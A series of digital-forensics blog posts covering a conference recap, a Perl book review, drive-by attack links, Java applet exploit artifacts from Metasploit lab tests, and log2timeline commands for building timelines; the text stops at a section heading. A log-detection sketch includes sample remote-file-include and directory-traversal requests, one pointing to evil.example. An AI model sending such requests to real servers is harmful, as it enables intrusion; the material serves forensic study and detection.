Harlan mentioned the scanner is still in development but he still did a tool demo by parsing a system’s Windows folder. A few things I noted about what I saw: there’s better documentation than Regripper (analyst’s name and platform included), still rips registry keys, lists files in a directory (prefetch folder contents were shown), runs external programs (evt.pl was executed), hashes files, and performs different file checks. I saw the value in this kind of tool before I sat through the session but seeing it in action reinforces how valuable this capability would be. I currently try to mimic some activities with batch scripting (see my triage post or obtaining information post). Those scripts took some time to put together and would require some work to make them do something else. I can foresee the forensic scanner handling this in a few seconds since plugins would just need to be selected; plus the scanner can do stuff that's impossible with batch scripting.

Speaking of scripts … Harlan mentioned during his presentation a batch script I put together that runs Regripper across every volume shadow copy (VSC) on a system. I was caught a little off guard since I'd never imagined Harlan mentioning my work during his presentation. I probably didn’t do a good job explaining the script during the session since I wasn’t expecting to talk about it. Here is some information about the script. As Harlan mentioned, I added functionality to the script besides running Regripper (I still have a standalone script for Regripper in case anyone doesn’t want the other functions). The script can identify the differences between VSCs, hash files in VSCs, extract data (preserving timestamps and NTFS permissions) from VSCs, and list files in the VSC. The script demonstrates that you can pretty much do as you please with VSCs whether you are examining a forensic image or a live system. In a few weeks I’ll provide a little more information about the script and why I wrote it, and over the next few months I’ll write a series of posts explaining the logic behind the script before I release it.

PFIC Summary

Overall PFIC was a great experience. I learned a lot of information, I have a to-do list outlining the various things to research/test further, and I met some great people. The return on investment for my company sending me to the conference is that in a few weeks I’ll be able to perform log analysis, I’m more knowledgeable about mobile device forensics, and if I get into a jam I now have a few people I can reach out to for help.

Closing out my post I wanted to share a few thoughts for improvement. I didn’t have many which I guess is a good thing. ;)

1. Make the names on the name tags bigger. I think my biggest struggle during the conference was trying to figure out people’s names since I couldn’t read the tags.

2. Presenters should answer all questions during the session if time permits; especially if the question is a follow-up to something the presenter said. Another attendee asked a great question but I had to stick around for about five minutes after the session to hear the answer. It wasn’t like the question was controversial or something.

3. Verify that all equipment works before the session. One of the labs hit a speed bump when numerous attendees (me included) couldn’t acquire a phone since numerous phones didn’t work. Everyone was able to do the acquisition eventually but time was lost trying to find phones that actually worked.

Book Review Perl Programming for the Absolute Beginner

Monday, October 24, 2011 Posted by Corey Harrell 5 comments
I find myself in more situations where I’m not completely satisfied with my DFIR tools. They either don’t parse certain information or lack capabilities I want. Batch scripting helped in some situations but the scripts are limited in what I can do. For example, it’s difficult (if not impossible) to create a script to extract information from an artifact that’s not supported by existing tools. Learning a programming language has been at the top of my to-do list for some time due to these reasons. I was browsing my local book store when I came across the book Perl Programming for the Absolute Beginner.

Why Perl Programming for the Absolute Beginner

I chose the book after I skimmed through a few other Perl programming books. Perl Programming for the Absolute Beginner is written for an audience without previous programming experience. The book goes into great detail explaining basic programming concepts such as variables, arrays, loops, and subroutines. I took a C++ course as an undergraduate about seven years ago and the only thing I remember is that I took a C++ course. Basically, I have zero programming knowledge including not knowing much about programming concepts. A lot of the books I skimmed, such as Learning Perl, don’t take the time to explain the basic concepts since they expect the reader to be already familiar with them. I wanted a book to explain the basics in addition to the language; Perl Programming for the Absolute Beginner fit the bill.

Numerous books I looked at use exercises at the end of each chapter to reinforce the material covered. The exercises are pretty simple and perform one action such as a math calculation. Perl Programming for the Absolute Beginner takes a different approach in teaching Perl. Instead of individual exercises the book has the reader write computer games which are fully functioning programs. I thought this approach does a better job showing how to use Perl since it covers the planning, organizing, coding, and testing activities involved with script development. Plus the approach was entertaining and it kept my interest. I’d rather write a “Fortune Teller Game” than a script to compute “the circumference of a circle”. ‘nuff said.

What I learned

My review is going to be a little different. I’m neither discussing the book’s contents (if you want to know then read the table of contents) nor how helpful the book could be. Instead I’m talking about what I learned from the book and how it has impacted my DFIR work so far.

Seeing Behind the Curtain

Bear with me for this analogy… When I was younger I used to love watching Kung-fu. At times I watched movies completely in another language without subtitles. I got the gist of what was going on by watching body language, facial expressions, tones of people’s voices, and the bad guys getting stomped. However, when I watched the same movie in English (subtitles or dubbed over) I realized how much I missed about the movie’s plot. Learning Perl is the equivalent of adding subtitles or dubbed English to a Kung-fu movie. Before I understood the gist of what my Perl tools were doing but it’s completely different when you can read and actually understand the code to see how it produces its output. It let me see behind the tool abstraction curtain.

Extending my Capability

I was deciding between learning Perl and Python since programs in my toolbox are written in those languages. One of my goals is to learn a language that lets me customize tools to better meet my needs. I picked Perl because two tools I extensively use are written in Perl and plug-in based. Plug-ins allow the tool to be extended fairly easily and I felt knowing how to write them would have a greater impact on my DFIR work. My immediate need was for a Regripper plug-in to parse the UserInfo registry key in an NTUSER.DAT hive (I could have asked others for this but I wanted to learn how to do it). In the past I manually examined the UserInfo key in the NTUSER.DAT hive and, if present, the hives in system restore points or volume shadow copies. Performing the task was time consuming but I needed to know the information. Perl Programming for the Absolute Beginner taught me enough about Perl to make it pretty easy to write a plug-in once I re-read the creating plug-ins section in Windows Registry Forensics. Taking the time to put the userinfo plug-in together will make things easier and faster for me in the future since I can now extract the information from a system in seconds. Talk about improving efficiency.

Breaking my Handcuffs

I’m still wearing handcuffs since I’m still dependent on existing tools and scripts created by others. However, Perl Programming for the Absolute Beginner opened my eyes to a future where if I encounter an artifact not supported by my tools then I could just write my own. A future where I no longer have to be satisfied and accept tools’ outputs when I want to see data differently. A future where repetitive tasks can be automated enabling me to spend more time on analyzing information. The book opened my eyes to a world where I don’t have to be handcuffed to my DFIR tools and the capabilities they provide. Perl Programming for the Absolute Beginner did not make me into a tool developer but it provided me with a foundation to build upon.

Four Star Review

Not all is rosy with the book though. I normally can overlook typos but I’m not very forgiving when there are typos in the code the reader is supposed to copy. It’s bad enough that beginners are going to mess something up and spend time tracking down their own mistakes. There’s no need to add even more typos resulting in people questioning themselves wondering what else they did wrong. Chapter Four’s Star Wars Quiz declares a variable named $valid but the rest of the program uses the variable $isvalid (on page 129). That small typo makes the game not work until the variable $valid is changed to $isvalid. As a reader I shouldn’t be required to find typos in code in order to make things work. I spend enough time finding my own mistakes as it is.

Overall I give Perl Programming for the Absolute Beginner a four star review (based on Amazon’s rating scheme). I highly recommend the book for anyone looking to learn the Perl programming language in addition to basic programming concepts. The book teaches the basics in an entertaining way enabling anyone to write simple scripts to solve issues. For those with programming backgrounds I suggest looking elsewhere for a book on Perl since this one is too basic. Learning Perl is a decent candidate because its target audience is people familiar with programming concepts (I moved on to this book after reading Perl Programming for the Absolute Beginner).

Linkz about Attacks

Sunday, October 16, 2011 Posted by Corey Harrell 0 comments
In this round of links I’m talking about drive-bys, malicious ads, web attack artifacts revealed with Mandiant’s Highlighter, and a justification for companies to fail security audits.

Video Showing Drive-by Download from MySQL

As most people probably heard by now MySQL.com was serving up malware to its visitors last month. SecurityMonkey put together the post [Video]: Watch Malware Drive-By Download from MySQL.com which contained various links about the incident. One link was to a video created by Armorize that captured what happened to anyone who visited the website when the issue was occurring. The video is about five minutes long and I highly recommend for people to check it out. I’ve never seen a drive-by broken down before by video. The video by itself is pretty cool but I think the true value is in what it shows about the attack vector infecting people visiting the website. Check out the sequence of events I noted from the video:

        -  (00:55) Internet Explorer starts to load the website mysql.com
        -  (01:04) Java.exe starts running on the computer
        -  (01:11) Executables are dropped onto the computer. These were the attack’s payload
        -  (03:43) It was revealed that a Jar file was downloaded to the system and this is why Java started. The Jar file download occurred before the executables appeared on the computer

The attack summary is that a user visited mysql.com and was eventually redirected to a site hosting the Blackhole exploit pack. In that instance, the exploit pack used a Java vulnerability to infect the system. Why does any of this even matter … knowing this can help determine how a system was compromised. Let’s say someone was dealing with an infected computer and was trying to figure out how the malware got installed on the computer. The video didn’t show what was on the system’s hard drive but the attack is very similar to the Java exploit artifacts I documented. To date I’ve documented three different ones which were Java Signed Applet Exploit Artifacts, CVE-2010-0840 (Trusted Methods) Exploit Artifacts, and CVE-2010-0094 (RMIConnectionImpl) Exploit Artifacts. There was a consistent pattern to all the artifacts:

        -  Temporary file created (Jar file got dropped onto the system)
        -  Indications of a vulnerable Java executing
        -  Internet activity showed a user visited a malicious website

The key difference (besides the Java vulnerability) between the Armorize video and the method I used to document the exploit artifacts was the tool used to create and deliver the exploit. The video documented a Java exploit from the Blackhole exploit pack and according to Contagio’s August 2011 Exploit Pack Overview spreadsheet Blackhole goes for $1,500 a year. My testing leveraged the freely available Metasploit to document exploit artifacts. Taking the time to document the exploit artifacts can pay big dividends during an examination when trying to determine the “how”. How did the system get infected? Well if the activity on the system around the time malware was created shows either a Jar file appearing or Java executing then a Java vulnerability may have been the culprit. If there is Internet activity then the Internet and a web browser may have been used to deliver the exploit to the system.
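The check described above (look at activity around the time the malware was created for a Jar file appearing or Java executing) can be sketched in a few lines of Python. This is only a minimal sketch and not a tool I used: the function name, the five minute window, the keyword list, the timestamps, and the malware.exe entry are all assumptions made for illustration. The Jar and prefetch file names are borrowed from my Java Signed Applet test system.

```python
from datetime import datetime, timedelta

def java_exploit_indicators(entries, malware_time, window_minutes=5):
    """Return timeline entries near malware_time that mention a Jar file or Java executing.

    entries is a list of (timestamp, description) tuples. The keyword list is an
    illustrative assumption, not an exhaustive set of Java exploit artifacts.
    """
    window = timedelta(minutes=window_minutes)
    keywords = ("jar_cache", ".jar", "java.exe")
    hits = []
    for when, description in entries:
        if abs(when - malware_time) <= window:
            lowered = description.lower()
            if any(keyword in lowered for keyword in keywords):
                hits.append((when, description))
    return sorted(hits)

# Hypothetical timeline entries; the timestamps are made up for the example.
timeline = [
    (datetime(2011, 10, 13, 9, 58, 0), "IE history: visit to http://192.168.11.200/"),
    (datetime(2011, 10, 13, 10, 0, 5), "File created: Temp/jar_cache5490377340104033776.tmp"),
    (datetime(2011, 10, 13, 10, 0, 7), "Prefetch: JAVA.EXE-0C263507.pf"),
    (datetime(2011, 10, 13, 10, 0, 20), "File created: Temp/malware.exe"),
    (datetime(2011, 10, 13, 14, 30, 0), "Prefetch: NOTEPAD.EXE"),
]
malware_created = datetime(2011, 10, 13, 10, 0, 20)

indicators = java_exploit_indicators(timeline, malware_created)
for when, description in indicators:
    print(when.isoformat(), description)
```

A hit only generates a lead. The entries around it (such as the Internet activity just before the Jar file appeared) still have to be reviewed to confirm how the exploit was delivered.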

Malicious Advertisement Leads to PDF Exploit

I first started looking into attack vector artifacts when one of my systems got whacked with a Fake AV virus. At the time I had the DF skills but I lacked the IR skills such as figuring out what happened to my system. I took a shot at trying to figure out how the system became infected to see if I could. It took me a little bit but I was not only able to find the malware dropped onto my system but I traced the infection back to Yahoo email. I was even able to determine the exploit used in the drive-by. It was a malicious PDF file that targeted a vulnerability in Adobe Reader. The PDF appeared on the system in the temporary Internet files folder just prior to the first malware getting dropped. The experience taught me valuable lessons. First the more obvious one; don’t quickly check your web email from a test system with vulnerable apps even if it’s only for a few seconds. The second and more important lesson was the need to understand how different attacks appear on a system after they have occurred. The examination took me some time to figure out since I didn’t really know what to expect or what artifacts to look for.

I recently came across TrendMicro’s post Malicious Ads Lead to PDF Exploits. The post is from last year but it made me reflect on the experience that motivated me to start my journey into incident response. The post mentioned how malvertisements on a popular web-based email service led to users being directed to sites with exploits. The article isn’t written from the DFIR perspective since it was focused on the vulnerabilities targeted in the attack. There wasn’t much discussion about the artifacts left on a system either besides malicious PDFs and internet activity. The little information provided did show how the attack occurred.

        -  User visits web based email service
        -  Redirect downloads malicious PDFs targeting Adobe Reader vulnerabilities
        -  Adobe reader has to process the PDF for the exploit to be successful and install malware

The attack pattern is something I’ve seen in a few other places. My infected test system had the same sequence of events but it took me a bit to actually see it. That examination made me more aware about the artifacts associated with a PDF exploit thereby making it easier to spot it in a few other examinations I did afterwards. I also saw the same pattern on my test systems I exploited with Metasploit. I researched a PDF exploit in the post CVE-2010-2883 (PDF Cooltype) Exploit Artifacts. Do the following areas I noted in the post look familiar?

        -  PDF document created
        -  There were references about a PDF file being accessed
        -  A vulnerable Adobe Reader started on the system

Web Attack Artifacts

Russ McRee’s October Toolsmith Log Analysis with Highlighter is a great read for a couple reasons. I enjoy reading his articles since he provides an overview about a tool’s functionality. In this edition he doesn’t disappoint as he covers how to perform log analysis with Mandiant’s Highlighter. Showing how to do log analysis is cool enough but he demonstrates the tool by looking for attacks in his website’s logs. He looks for specific artifacts caused by remote file include and directory traversal attacks. I haven’t found any references that document the artifacts left in logs by different attacks so I enjoyed reading about it. Eventually I’m going to start researching the artifacts left in logs but I still have a lot to do with the artifacts left on systems.
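To give a rough idea of what looking for those two attacks in web server logs might involve, here is a minimal Python sketch. It isn’t taken from the Toolsmith article or from Highlighter. The two patterns, the function name, and the sample log lines are my own assumptions and would miss plenty of real-world variations.

```python
import re
from urllib.parse import unquote

# Illustrative patterns only (assumptions, not a complete signature set).
TRAVERSAL = re.compile(r"\.\./|\.\.\\")
REMOTE_INCLUDE = re.compile(r"[?&][^=&\s]+=(?:https?|ftp)://", re.IGNORECASE)

def classify_request(log_line):
    """Return the attack types a single web log line appears to contain."""
    decoded = unquote(log_line)  # undo URL encoding such as %2F before matching
    findings = []
    if TRAVERSAL.search(decoded):
        findings.append("directory traversal")
    if REMOTE_INCLUDE.search(decoded):
        findings.append("remote file include")
    return findings

# Hypothetical log lines written for this example.
sample_lines = [
    '10.0.0.5 - - [01/Oct/2011:10:00:00 -0400] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Oct/2011:10:01:00 -0400] "GET /view.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0',
    '10.0.0.7 - - [01/Oct/2011:10:02:00 -0400] "GET /about.html HTTP/1.1" 200 1024',
]

for line in sample_lines:
    print(classify_request(line), line.split('"')[1])
```

Decoding the line first matters because attackers often URL encode the traversal sequence, so a search for the literal ../ would not match the raw log entry.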

Fail a Security Audit Already Will You

When I started working full time in the information security field I was performing vulnerability assessments and security audits. Maybe I’m a little biased because of my background but I can see the value security audits provide when performed correctly. I’m not talking about audits where boxes are just checked off but risk based audits looking at the security controls protecting an organization’s critical information. Andreas M. Antonopoulos's article Fail a security audit already -- it's good for you provides an argument for why companies should fail security audits. The article makes some great points but the one thing I thought was missing is when organizations try to justify (aka make excuses) or minimize why serious weaknesses are present. Take patching as an example.

Patching isn’t done to prevent applications and systems from breaking. I was a system admin so I get it … especially since I’ve dealt with the hassle of tracking down the patches that jacked up my systems. However, using that reason as a justification to not patch without doing any due diligence by, you know, actually testing patches to see if anything breaks is something else. The SANS Top Cyber Security Risks report from a few years ago highlighted how third party applications on client systems are targeted. The exploits I discussed in this linkz edition targeted vulnerabilities in client applications such as Java and Adobe. How can these vulnerabilities on computers with users surfing the web be lumped into the same category as some application supporting a critical business process with neither of them getting patched? The security risk didn’t go away and the vulnerabilities don’t magically repair themselves. It’s too late to finally figure it out once the organization is staring at the artifacts from a successful exploit.

Java Signed Applet Exploit Artifacts

Thursday, October 13, 2011 Posted by Corey Harrell 0 comments
Artifact Name

Java Signed Applet Exploit Artifacts

Attack Vector Category

Exploit

Description

A signed Java applet is presented to a user and a dialog box asks the user if they trust it. If the user is socially engineered to run the applet then arbitrary code executes under the context of the currently logged on user.

Attack Description

This description was obtained using the Metasploit exploit reference. A user visits a web page hosting the signed Java applet and a Java window pops up asking the user to run the applet. Once the user runs it then a program is downloaded and executed on the system.

Exploits Tested

Metasploit v4.0 multi\browser\java_signed_applet

Target System Information

* Windows XP SP3 Virtual Machine with Java 6 update 16 using administrative user account

* Windows XP SP3 Virtual Machine with Java 6 update 16 using non-administrative user account

Different Artifacts based on Administrator Rights

No

Different Artifacts based on Software Versions

Not tested

Potential Artifacts

The potential artifacts include a Jar file and the changes the exploit causes in the operating system environment. The artifacts can be grouped under the following three areas:

        * Temporary File Creation
        * Indications of the Vulnerable Application Executing
        * Internet Activity

Note: the documenting of the potential artifacts attempted to identify the overall artifacts associated with the vulnerability being exploited as opposed to the specific artifacts unique to Metasploit. As a result, the actual artifact storage locations and filenames are inside of brackets in order to distinguish what may be unique to the testing environment.

        * Temporary File Creation

            - JAR file created in a temporary storage location on the system within the timeframe of interest. [C:/Documents and Settings/Administrator/Local Settings/Temp/jar_cache5490377340104033776.tmp] The contents of the JAR file contained a manifest file, a class file, and an executable.


        * Indications of the Vulnerable Application Executing

           - Log files indicating Java was executed within the timeframe of interest. [C:/Documents and Settings/Administrator/Application Data/Sun/Java/Deployment/deployment.properties, C:/Documents and Settings/Administrator/Local Settings/Temp/java_install_reg.log, and C:/Documents and Settings/Administrator/Local Settings/Temp/jusched.log] The picture below shows the contents of the deployment.properties log.


            - Prefetch files of Java executing. [C:/WINDOWS/Prefetch/JAVA.EXE-0C263507.pf]

            - Registry modification involving Java executing at the same time as reflected in the jusched.log file. [HCU-Admin/Software/JavaSoft/JavaUpdate/Policy/JavaFX]

            - Folder activity involving the Java application. [C:/Program Files/Java, C:/Documents and Settings/Administrator/Application Data/Sun/Java/Deployment/, and C:/Documents and Settings/Administrator/Local Settings/Temp/hsperfdata_username]

        * Internet Activity

            - Web browser history of user accessing websites within the timeframe of interest. [Administrator user account accessed the computer -192.168.11.200- running Metasploit]

            - Files located in the Temporary Internet Files folder. [C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/]

            - Registry activity involving Internet Explorer

Timeline View of Potential Artifacts

The images below show the above artifacts in a timeline of the file system from the Windows XP SP3 system with an administrative user account. The timeline includes the file system, registry, prefetch, event logs, and Internet Explorer history entries.






References

Exploit Information


Metasploit Exploit Information http://www.metasploit.com/modules/exploit/multi/browser/java_signed_applet

Building Timelines – Tools Usage

Sunday, September 25, 2011 Posted by Corey Harrell 3 comments
Tools are defined as anything that can be used to accomplish a task or purpose. For a tool to be effective some thought has to go into how to use it. I have a few saws in my garage but before I try to cut anything with them I first come up with a plan on what I’m trying to accomplish. Timeline tools are no different and their usage shouldn’t solely consist of running commands. The post Building Timelines – Thought Process Behind It discusses an approach to develop a plan on the way timeline tools will be used. This post is the second part where the tools to build timelines are discussed.

There is not a single tool for building timelines since tools vary based on the DFIR practitioner’s needs and preferences. When I first started learning about timeline analysis I read as much as I could about the technique and downloaded various tools to test their capabilities to see what worked best for me. I’m discussing my current method and a few tools that I build timelines with. The method is different from what I was doing last month and will probably change down the road as tools are updated, new tools are released, and my needs/preferences vary.

I’m trying to show different ways timelines can be built in addition to building my own timeline for an infected Windows XP SP3 test system. The artifacts selected for my timeline are: event logs, Internet Explorer history, XP firewall logs, prefetch files, Windows restore points, select registry keys, entire registry hives, and the file system metadata. The user specific artifacts (i.e., history and registry keys from the NTUSER.DAT hive) only need to be parsed for the administrator user account. The extraction of the timestamps from those artifacts will be accomplished in the following activities:

        -  Artifact Timestamps
        -  File System Timestamps
        -  Registry Timestamps

Tools’ Output

Before a timeline can be created one must first choose what format to use for the tools’ output. Selecting the format up front ensures multiple tools’ outputs can go into the same timeline. Three common output types are: bodyfile, TLN, and comma-separated value (csv). The bodyfile format shows file activity and separates the output into different sections. The version in use will determine what the sections are but the Sleuthkit Wiki bodyfile page explains the differences and provides an example. The TLN format breaks the data up into five sections: time, source, host, user, and description. Harlan provided a great description about his format in the post Timeline Analysis...do we need a standard? and in Appendum for the post TimeLine Analysis, pt III. The csv format stores data so it is separated by rows and columns. This format works well for viewing the timeline data in spreadsheets. However, unlike the bodyfile and TLN formats csv is not a standard format. The csv schema from tools may differ resulting in the need for additional processing for the outputs to go into the same timeline. Kristinn’s post Timeline Analysis 201 – review the timeline explains the csv schema used in his Log2timeline tool.
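To make the five TLN sections a little more concrete, here is a minimal Python sketch that splits a TLN line into time, source, host, user, and description. It assumes the sections are separated by the pipe character and that the time is a Unix epoch value in UTC, which is how I understand Harlan’s description of the format. The function name and the sample line are made up for illustration.

```python
from collections import namedtuple
from datetime import datetime, timezone

# The five TLN sections named above.
TlnEvent = namedtuple("TlnEvent", "time source host user description")

def parse_tln(line):
    """Split one TLN line (assumed pipe-delimited, epoch time in UTC) into its five sections."""
    # maxsplit=4 keeps any pipe characters inside the description intact
    time_s, source, host, user, description = line.rstrip("\n").split("|", 4)
    when = datetime.fromtimestamp(int(time_s), tz=timezone.utc)
    return TlnEvent(when, source, host, user, description)

# Hypothetical TLN line written for this example.
sample = "1317427200|EVT|TESTPC|Administrator|Hypothetical event record"
event = parse_tln(sample)
print(event.time.isoformat(), event.source, event.host, event.user, event.description)
```

Once every tool’s output is broken into the same sections like this, converting between formats mostly comes down to mapping the sections onto the columns of the target format.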

I mostly review timelines with spreadsheet programs so I opted for Log2timeline’s csv format. I use Log2timeline to convert other tools’ outputs into proper csv schema. My timeline in this post uses the csv format and I demonstrate how to convert between different formats.

Artifact Timestamps

I couldn’t come up with a good name when I was thinking about how to explain the different activities I do when creating timelines. What I mean when I say artifact timestamps is everything except for the last write times from dumped registry hives and timestamps from the file system. The different tools to extract timestamps from artifacts include Harlan’s timeline tools and Log2timeline. Harlan accompanies his tools posted on the Win4n6 yahoo group with a great step by step guide about building timelines with his tools. I cover how to use Log2timeline and the following is a brief explanation about the tool’s syntax:

log2timeline.pl -z timezone -f plugin/plugin_file -r -w output-file-name log_file/log_dir

        -z defines the timezone for the computer where the artifacts came from
        -f specifies the plugin or plugin file to run against the file/directory
        -w specifies the file to write the output to
        -r makes log2timeline work in recursive mode so the folder specified and its subfolders are all examined for artifacts
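
When the same options are typed over and over for different artifacts, it can help to assemble the command from its parts. The following is a minimal Python sketch that only builds the argument list from the four switches described above. The helper name build_l2t_command is hypothetical and is not part of Log2timeline.

```python
def build_l2t_command(timezone, plugin, output_file, target, recursive=False):
    """Return the argument list for one log2timeline.pl run.

    Only the switches explained above are used: -z, -f, -w, and -r.
    """
    cmd = ["log2timeline.pl", "-z", timezone, "-f", plugin, "-w", output_file]
    if recursive:
        # -r makes the tool walk the target folder and its subfolders.
        cmd.append("-r")
    cmd.append(target)
    return cmd


if __name__ == "__main__":
    # Print the command instead of running it so it can be reviewed first.
    print(" ".join(build_l2t_command("local", "evt", "fake-timeline.csv",
                                     r"F:\WINDOWS\system32\config\SecEvent.Evt")))
```

The list form can be handed to subprocess.run as-is, which avoids quoting problems with paths that contain spaces.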

Options to Extract Timestamps with Single Plugin or Default Plugin File

Log2timeline is plugin based and the tool can execute a single plugin against a single file/directory or execute a plugin file against multiple files in directories. I prefer to use custom plugin files for my timelines but first I wanted to show the single plugin and default plugin file methods. The command below will execute the evt plugin to parse the Security Windows event log and the output will be written to a file named fake-timeline.csv.

log2timeline.pl -z local -f evt -w fake-timeline.csv F:\WINDOWS\system32\config\SecEvent.Evt

The single plugin method requires multiple commands to extract timestamps from different artifacts in a system. Plugin files address the multiple command issue since the file contains a list of plugins to run. Log2timeline comes with a few default plugin files and the one that best fits my selected artifacts is the winxp plugin file. The command below runs the winxp plugin file against the entire mounted forensic image (the differences from the previous command are the winxp plugin file, the -r switch, and the target path).

log2timeline.pl -z local -f winxp -w fake-timeline.csv -r F:\

The winxp plugin file makes things a lot easier since only one command has to be typed. However, the file parses a lot more data than I actually need. The plugins executed are: chrome, evt, exif, ff_bookmark, firefox3, iehistory, iis, mcafee, opera, oxml, pdf, prefetch, recycler, restore, setupapi, sol, win_link, xpfirewall, wmiprov, ntuser, software, and system. I only wanted to parse IE history but winxp is doing every browser supported by log2timeline. I only wanted to parse artifacts in the administrator’s user profile but the above command is parsing artifacts from every profile on the system. I wanted to limit my timeline to specific artifacts but winxp is giving me everything. Not exactly what I’m looking for.

Single plugins and default plugin files are viable methods for building timelines. However, neither lets me easily build a timeline containing only my selected artifacts, tailored to the case and system I’m processing. This is where custom plugin files come into play and why I use them instead.

Extracting Timestamps for my Timeline with Custom Plugin Files

Kristinn deserves all the credit for why I know about the ability to create custom plugin files. I’m just the guy who asked him the question and decided to blog the answer he gave me. A custom plugin file is a text file that lists one plugin per line and is saved with the .lst file extension. The picture is a custom file named test.lst and it contains plugins for prefetch files, event logs, and system restore points.

Custom Plugin File Example

The custom file is placed in the same directory where the default plugin files are located. On a Windows system with Log2timeline 0.60 installed the directory is C:\Perl\lib\Log2t\input\.
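
Since a custom plugin file is just a text file with one plugin per line, it can be generated as easily as typed. Below is a minimal Python sketch, assuming nothing more than that layout and the .lst extension. The helper name write_plugin_file is hypothetical, and the demo writes to a temporary folder rather than the Log2timeline input directory so nothing on a real install is touched.

```python
import tempfile
from pathlib import Path


def write_plugin_file(directory, name, plugins):
    """Write <name>.lst into directory with one plugin name per line."""
    path = Path(directory) / f"{name}.lst"
    path.write_text("\n".join(plugins) + "\n", encoding="ascii")
    return path


if __name__ == "__main__":
    # Demo only: a throwaway folder stands in for the plugin directory.
    with tempfile.TemporaryDirectory() as folder:
        created = write_plugin_file(folder, "test",
                                    ["prefetch", "evt", "restore"])
        print(created.read_text(encoding="ascii"))
```

The file is then referenced by its name without the extension, the same way the default plugin files are passed to the -f switch.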

I only want to parse artifacts in the administrator user profile instead of all user profiles stored on the system. At the time I wrote this post, Log2timeline doesn’t have the ability to exclude full paths (such as unwanted user profiles) when running in recursive mode. As a result I create two custom plugin files; one file parses the artifacts in a user profile while the other parses the remaining artifacts throughout the system. This lets me control what user profiles to extract timestamps from since I can run the user plugin file against the exact ones I need.

The user custom plugin file is named custom_user.lst and contains the iehistory and ntuser plugins. The other custom plugin file is named custom_system.lst and contains the evt, xpfirewall, prefetch, and restore plugins. The two commands below execute the custom_user.lst against the administrator’s user account profile and custom_system.lst against the entire drive while saving the output to the file timeline.csv.

log2timeline.pl -z local -f custom_user -w C:\win-xp\timeline.csv -r "F:\Documents and Settings\Administrator"

log2timeline.pl -z local -f custom_system -w C:\win-xp\timeline.csv -r F:\

The commands extracted the timestamps from all of the artifacts on my list except for the registry hives’ last write times and the file system timestamps. The picture shows the timeline built so far. The timeline is sorted and the section shown is where the prefetch file I referenced in the post What’s a Timeline is located.

Timeline Data Added by Custom Plugin File

Filesystem Timestamps

The filesystem timestamps step adds the activity involving files and directories to the timeline. There are different tools that extract the information including FTK Imager, AnalyzeMFT, Log2timeline, and the Sleuthkit. I’m demonstrating two different methods of adding the data to my timeline to show the differences between them. The tools for the first method include the Sleuthkit and Log2timeline while the second method only uses Log2timeline.

The fls.exe program in the Sleuthkit will list the files and directories in an image. The command below creates a bodyfile containing the files/directories’ activity in the test forensic image and stores the output in the file named fls-bodyfile.txt (the -m switch makes the output format mactime, -r is for recursive mode, and -o is the sector offset where the filesystem starts).

fls.exe -m C: -r -o 63 C:\images\image.dd >> C:\win-xp\fls-bodyfile.txt

Fls.exe’s output is in the bodyfile format but my timeline is in Log2timeline’s csv format. Log2timeline has plugins to parse output files in the TLN and bodyfile formats. This means the tool can be used to convert one format into another. The command below parses the fls-bodyfile.txt file and adds the data to my timeline.

log2timeline.pl -z local -f mactime -w C:\win-xp\timeline.csv C:\win-xp\fls-bodyfile.txt

The picture highlights the new entries to the section of my timeline. Doesn’t the story about what occurred become clearer?

Timeline Data Added by fls.exe

The file system in the Windows XP test system is NTFS. NTFS stores two sets of timestamps: the $STANDARD_INFORMATION and the $FILE_NAME attribute timestamps. Fls.exe, along with the majority of other forensic tools, shows the $STANDARD_INFORMATION timestamps. However, there may be times when it’s important to include both sets of timestamps in a timeline. One such occurrence is when there’s a concern that timestamps might have been altered. Parsing the Master File Table ($MFT) can add both sets of timestamps to a timeline. The command below shows Log2timeline parsing the $MFT and adding the output to the file timeline-copy.csv.

log2timeline.pl -z local -f mft -w timeline-copy.csv F:\$MFT

The picture below highlights the new entries for the data extracted from the $MFT. Notice the difference between the timeline only containing the $STANDARD_INFORMATION timestamps compared to containing both timestamps. Quick side note: the mft plugin could be added to a custom plugin file.

Timeline Data Added by $MFT
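
One reason to keep both sets of timestamps is that they can be compared. The Python sketch below shows one commonly cited check, flagging files whose $STANDARD_INFORMATION creation time is earlier than the $FILE_NAME creation time. This is only an illustration of the comparison: the MftRecord type and flag_suspect function are hypothetical, the records are assumed to have been extracted already, and a hit is a lead to look into rather than proof that timestamps were altered.

```python
from datetime import datetime
from typing import NamedTuple


class MftRecord(NamedTuple):
    """Creation times for one file, taken from both NTFS attributes."""
    path: str
    si_created: datetime  # $STANDARD_INFORMATION creation time
    fn_created: datetime  # $FILE_NAME creation time


def flag_suspect(records):
    """Return paths whose $SI creation time predates the $FN creation time."""
    return [rec.path for rec in records if rec.si_created < rec.fn_created]


if __name__ == "__main__":
    # Made-up sample data for demonstration only.
    sample = [
        MftRecord("C:/WINDOWS/system32/normal.dll",
                  datetime(2011, 11, 20, 10, 0, 0),
                  datetime(2011, 11, 20, 10, 0, 0)),
        MftRecord("C:/WINDOWS/system32/odd.exe",
                  datetime(2004, 8, 4, 12, 0, 0),
                  datetime(2011, 11, 20, 10, 5, 0)),
    ]
    print(flag_suspect(sample))
```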

Registry Timestamps

In the artifact timestamps section Log2timeline extracted data from select registry keys. However, there are times when I want the last write times of all registry keys in the registry hives. So far I have wanted this ability when dealing with malware infections, since it helps identify the persistence mechanism and registry modifications. The tools to extract the last write times from registry hives include Harlan’s regtime.pl script (I obtained it from the Sift 2.0 workstation) and Log2timeline. For my timeline I’m interested in the System, Software, and administrator’s NTUSER.DAT registry hives. The commands below have regtime.pl extracting the last write times from each hive and storing them in the bodyfile named reg-bodyfile.txt (the -m switch prepends the given text to each line and the -r switch is the path to the registry hive).

regtime.pl -m HKLM/system -r F:\Windows\System32\config\system >> C:\win-xp\reg-bodyfile.txt

regtime.pl -m HKLM/software -r F:\Windows\System32\config\software >> C:\win-xp\reg-bodyfile.txt

regtime.pl -m HKCU/Administrator -r "F:\Documents and Settings\Administrator\NTUSER.DAT" >> C:\win-xp\reg-bodyfile.txt

Regtime.pl’s output is in the bodyfile format so Log2timeline makes the format conversion as shown in the command below.

log2timeline.pl -z local -f mactime -w C:\win-xp\timeline.csv C:\win-xp\reg-bodyfile.txt

The picture highlights the new data added to the timeline from the registry hives. The timeline now highlights the malware’s persistence mechanisms (run and services registry keys).

Timeline Data with Registry Keys' Last Write Times

Sorting the Timeline

